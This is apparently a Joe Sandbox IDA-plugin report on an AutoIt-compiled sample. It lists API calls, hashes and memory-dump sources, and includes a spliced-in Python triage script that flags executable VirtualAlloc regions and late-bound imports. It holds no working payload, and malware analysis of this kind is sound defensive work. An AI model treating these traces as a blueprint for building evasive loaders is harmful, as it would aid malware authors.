                                                        • Instruction Fuzzy Hash: F621AF32601118AFDF118F54CC85FAB3BBAFB8A760F018128FA459B1A0D6719C6187A1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00847772
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00847787
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00847794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: ebec46ec5175baecf3ddfcc018054a30e27711046d7021e3813521c3d6b0f0d7
                                                        • Instruction ID: 2b16a4be59f4bf66ca2f4975f50d5bf38b139f4adaeca6d9ec27e54bede40d2c
                                                        • Opcode Fuzzy Hash: ebec46ec5175baecf3ddfcc018054a30e27711046d7021e3813521c3d6b0f0d7
                                                        • Instruction Fuzzy Hash: 3C11E372244208BAEF205F65CC45FEB77A9FF89B64F12422CFA45E6191D772E811CB20
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,008857B0,0084D809,000000FC,?,00000000,00000000,?,?,?,007FB969,?,?,?,?,?), ref: 0084ACD1
                                                        • GetFocus.USER32 ref: 0084ACD9
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • SendMessageW.USER32(00EDEDA8,000000B0,000001BC,000001C0), ref: 0084AD4B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                        • String ID: 0R
                                                        • API String ID: 3601265619-1916035689
                                                        • Opcode ID: 69d31e54f81f7ed42de1540d37a5513f2a14cbf906bfdd1b506c3354a63651e7
                                                        • Instruction ID: 95c4dfc877aca5cf8bafd22f72a97e81c4eb2d3a012ff30ab480552a4eeb1880
                                                        • Opcode Fuzzy Hash: 69d31e54f81f7ed42de1540d37a5513f2a14cbf906bfdd1b506c3354a63651e7
                                                        • Instruction Fuzzy Hash: 400192356025008FC714AF28D888B6677E6FB8A325F18027DF525CB2B1CB32AC46CB51
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C4B83,?), ref: 007C4C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007C4C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: 7515d4dd651e3af492b861163d6ab6bff515c2bbdfcb842120a9f052c1a3a7e1
                                                        • Instruction ID: b986ee9bc2186d21012ad29b348ad88790c03eb823fbefe8dde8e07da5024bfd
                                                        • Opcode Fuzzy Hash: 7515d4dd651e3af492b861163d6ab6bff515c2bbdfcb842120a9f052c1a3a7e1
                                                        • Instruction Fuzzy Hash: 8ED01774910B13CFD7209F31D918B1A77E4FF06391B11C83EA6A6D6275E6B8D880CA60
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C4BD0,?,007C4DEF,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007C4C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 78e12185bd98fab3c48ffb2fd3a657e669e4aef24a8b5ea13faadae9e4ed5724
                                                        • Instruction ID: 3d1320bd334249d7d5dee7fe816f7397db77d3504dfb17b036fbb5905a8590b2
                                                        • Opcode Fuzzy Hash: 78e12185bd98fab3c48ffb2fd3a657e669e4aef24a8b5ea13faadae9e4ed5724
                                                        • Instruction Fuzzy Hash: 79D01774911713CFD730AF71D918A07BAE5FF0A392B11CC3EA596D6261E6B8D880CB60
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00841039), ref: 00840DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00840E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 3a30354b3f47e2c5c8274fafe92e3f2ec0683615f8b7616f8f7ce0c3d1a49cb3
                                                        • Instruction ID: cc1f7f85811dc25ce340e531fe1fb0f633437a59869071ba4a464e0f218db264
                                                        • Opcode Fuzzy Hash: 3a30354b3f47e2c5c8274fafe92e3f2ec0683615f8b7616f8f7ce0c3d1a49cb3
                                                        • Instruction Fuzzy Hash: 23D08270800326CFC3218F70C80868376E4FF01352F00CC2ED69AC6250E6B4D8A0CA00
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00838CF4,?,0084F910), ref: 008390EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00839100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 5e619910e8eb82670e67d08287de2b841823e822353ba26dc030cd1d12153a81
                                                        • Instruction ID: 297cb393d322bff9e6085ba11e06b6ab76b4f3aeecf0c29f97b810bc98041d04
                                                        • Opcode Fuzzy Hash: 5e619910e8eb82670e67d08287de2b841823e822353ba26dc030cd1d12153a81
                                                        • Instruction Fuzzy Hash: 1DD01274550713CFD7209F31D81C50676D4FF06351F11C87DD5D5D6650EAB8C880CA90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 1232d12e7e5a12a36d40c807d76b3d3f3318a5489d0ec97461bab9878d70abee
                                                        • Instruction ID: 1b112c98342958a6e4e955433060b09f30e63f0f895c3bb07992daa445c512a3
                                                        • Opcode Fuzzy Hash: 1232d12e7e5a12a36d40c807d76b3d3f3318a5489d0ec97461bab9878d70abee
                                                        • Instruction Fuzzy Hash: D2D0177294611CEBCF809A909C8CCB9737CFB09325F5404A6F506E2085E229CB94EA21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ae90cd15117b204c5b69a17939e75c21d2bb03bcc187fc037dfb803df1be320
                                                        • Instruction ID: 34992b6e81b15c286757bc2b5923cc72ac7194393d550ee90e520778ef59e93c
                                                        • Opcode Fuzzy Hash: 6ae90cd15117b204c5b69a17939e75c21d2bb03bcc187fc037dfb803df1be320
                                                        • Instruction Fuzzy Hash: 35C13E75A0421AEFCB14CF94C884EAEBBB9FF48714B15859CE816EB251D730DD81DB90
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 0083E0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 0083E101
                                                          • Part of subcall function 0083D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0083D7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0083E301
                                                        • _memmove.LIBCMT ref: 0083E314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 606de15cba7cd84102eac2c161a55fd36fa99a3056f36f54c9f00a0e919b9a42
                                                        • Instruction ID: ccd3fa28d55d8d08991cdac057bf2e7e13fa7ca65c23608eee315b027fdfb1a9
                                                        • Opcode Fuzzy Hash: 606de15cba7cd84102eac2c161a55fd36fa99a3056f36f54c9f00a0e919b9a42
                                                        • Instruction Fuzzy Hash: DFC13171A083018FC714DF28C484A6ABBE4FF89714F14896EF899DB391D775E946CB82
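The following Python is an added triage aid written for this page; it is not part of the Joe Sandbox report, its IDA plugin, or the AutoIt runtime. It parses the "APIs" bullet lines in entries like the ones above and pulls out the two things worth checking first: VirtualAlloc calls whose flProtect carries an execute bit (the entry above passes 00000077, 00003000 and 00000040, i.e. 0x77 bytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, and is followed by _memmove into the buffer), and GetProcAddress resolutions paired with the LoadLibraryA that precedes them (the Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW and GetModuleHandleExW entries earlier in this section). The sample lines are copied from those entries; the function names parse_api_lines, executable_allocations and dynamic_imports are this example's own, and the LoadLibrary-to-GetProcAddress pairing is a sequential heuristic, not something the report states. One caveat a reviewer should keep in mind: late-binding these particular kernel32/advapi32 exports through GetProcAddress is consistent with a stock AutoIt3 runtime keeping compatibility with older Windows versions (the ">>>AUTOIT NO CMDEXECUTE<<<" string passed nearby points the same way), so those hits are context rather than evidence; the RWX allocation is the lead to resolve in the dump, to see whether it holds an interpreter thunk or a staged payload.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed offline fixture: "APIs" bullet lines copied from the function
# entries of this report (CharLowerBuffW/VirtualAlloc/_memmove and the
# LoadLibraryA/GetProcAddress stubs).
SAMPLE_LINES = """\
• CharLowerBuffW.USER32(?,?), ref: 0083E0BE
  • Part of subcall function 0083D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0083D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0083E301
• _memmove.LIBCMT ref: 0083E314
• LoadLibraryA.KERNEL32(kernel32.dll,?,007C4BD0,?,007C4DEF,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007C4C23
• LoadLibraryA.KERNEL32(advapi32.dll,?,00841039), ref: 00840DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00840E07
• GetFocus.USER32 ref: 0084ACD9
"""

# One bullet line: optional "Part of subcall function <addr>:" prefix,
# "<api>.<module>", an optional "(args)" list, then ", ref: <addr>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-F]{1,8}$")

# winnt.h constants for VirtualAlloc's flAllocationType and flProtect.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_PHYSICAL",
             0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_EXECUTE_MASK = 0xF0  # every PAGE_EXECUTE_* value has one of these bits set


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # address of the call site in the dump
    parent: Optional[str] = None  # set for "Part of subcall function" lines


def as_int(arg: str) -> Optional[int]:
    """Joe Sandbox prints numeric arguments as 8 hex digits; '?' and strings give None."""
    return int(arg, 16) if HEX_ARG.match(arg) else None


def decode_flags(value: Optional[int], table: dict) -> str:
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else f"0x{value:X}"


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # "APIs"/"Strings" headers and unrelated lines are skipped
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("parent")))
    return calls


def executable_allocations(calls: List[ApiCall]) -> List[dict]:
    """VirtualAlloc calls whose flProtect has an execute bit; RWX is the usual staging sign."""
    out = []
    for c in calls:
        if c.api == "VirtualAlloc" and len(c.args) >= 4:
            size, alloc_type, prot = (as_int(a) for a in c.args[1:4])
            if prot is not None and prot & PAGE_EXECUTE_MASK:
                out.append({"ref": c.ref, "size": size,
                            "type": decode_flags(alloc_type, MEM_FLAGS),
                            "protect": PAGE_PROT.get(prot, f"0x{prot:X}")})
    return out


def dynamic_imports(calls: List[ApiCall]) -> List[Tuple[str, str, int]]:
    """Pair each GetProcAddress with the nearest preceding LoadLibrary/GetModuleHandle.

    Ordering is a heuristic (assumption of this example): the report lists calls
    per function, so it holds within one entry but can mislead across entries.
    """
    pairs = []
    last_lib = "?"
    for c in calls:
        if c.api in ("LoadLibraryA", "LoadLibraryW",
                     "GetModuleHandleA", "GetModuleHandleW") and c.args:
            last_lib = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            pairs.append((last_lib, c.args[1], c.ref))
    return pairs


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    for a in executable_allocations(calls):
        print(f"{a['ref']:08X}: VirtualAlloc size=0x{a['size']:X} {a['type']} {a['protect']}")
    for lib, name, ref in dynamic_imports(calls):
        print(f"{ref:08X}: resolves {lib}!{name} at run time")
```

Run it against the whole "APIs" section of a report to get a single list of executable allocations and late-bound imports per call-site address; the ref address is what you then look up in the memory dump listed under Memory Dump Source.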
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 008380C3
                                                        • CoUninitialize.OLE32 ref: 008380CE
                                                          • Part of subcall function 0081D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0081D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 008380D9
                                                        • VariantClear.OLEAUT32(?), ref: 008383AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: 3afffcf66ac64a8a113e61c4c60ff5c634ab6750975cd73a0be423b6abaf5fd2
                                                        • Instruction ID: 07498934cb10e5fef0e9e58e7a2be9b52a0b0fad6122e5cce65c82572bcd211f
                                                        • Opcode Fuzzy Hash: 3afffcf66ac64a8a113e61c4c60ff5c634ab6750975cd73a0be423b6abaf5fd2
                                                        • Instruction Fuzzy Hash: 55A1FF75604701DFCB40DF24C889A2AB7E4BB89714F14445CFA9A9B3A2CB34E945CB82
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00852C7C,?), ref: 008176EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00852C7C,?), ref: 00817702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0084FB80,000000FF,?,00000000,00000800,00000000,?,00852C7C,?), ref: 00817727
                                                        • _memcmp.LIBCMT ref: 00817748
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 051cdb16f4d6ac156e44b27251502acf242c090a3a6968c43f0d4023f20406e0
                                                        • Instruction ID: e0aec15170d313168400410473dc661b784ccd6ec37b2a0e96262de76612f25f
                                                        • Opcode Fuzzy Hash: 051cdb16f4d6ac156e44b27251502acf242c090a3a6968c43f0d4023f20406e0
                                                        • Instruction Fuzzy Hash: 38810B75A00109EFCB04DFA4C988EEEB7B9FF89315F204558E506EB250DB71AE46CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: dd0826aee0bf12b2ecec12eb9681e9b6e6acf5b6bd2372f8193e48ddb7890cf1
                                                        • Instruction ID: 0c171562783d0b7d284e11ef2f70fb45c6af1499a349786accd0f1dd73fba28e
                                                        • Opcode Fuzzy Hash: dd0826aee0bf12b2ecec12eb9681e9b6e6acf5b6bd2372f8193e48ddb7890cf1
                                                        • Instruction Fuzzy Hash: 6E51AF747003069ACB24AF69D895ABAB7EDFF45310F20D81FE5C6DB291EA74D8E08701
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00819AD2
                                                        • __itow.LIBCMT ref: 00819B03
                                                          • Part of subcall function 00819D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00819DBE
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00819B6C
                                                        • __itow.LIBCMT ref: 00819BC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: 2d4db00ff199ea24b5a10b3bbfcea385ab4312b7c13ab4cfa7329369463fc29c
                                                        • Instruction ID: c45342c763452c855032e2e790e2143c22b77a308d3ede6d52424a979f6a5ecd
                                                        • Opcode Fuzzy Hash: 2d4db00ff199ea24b5a10b3bbfcea385ab4312b7c13ab4cfa7329369463fc29c
                                                        • Instruction Fuzzy Hash: CA41AF70A04219ABDF25EF54D859FEE7BB9EF48720F00006DF949A3291DB749A84CB61
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 008369D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008369E1
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00836A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00836A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 70be03f3c3e8c82310063ae1f7a92e6535f42b13d636aadab2cf4065632ffc1b
                                                        • Instruction ID: 3b9630a646b3507415c7d9a1c2ca36d5d10c4d84edb117d5c262a800b1b8a749
                                                        • Opcode Fuzzy Hash: 70be03f3c3e8c82310063ae1f7a92e6535f42b13d636aadab2cf4065632ffc1b
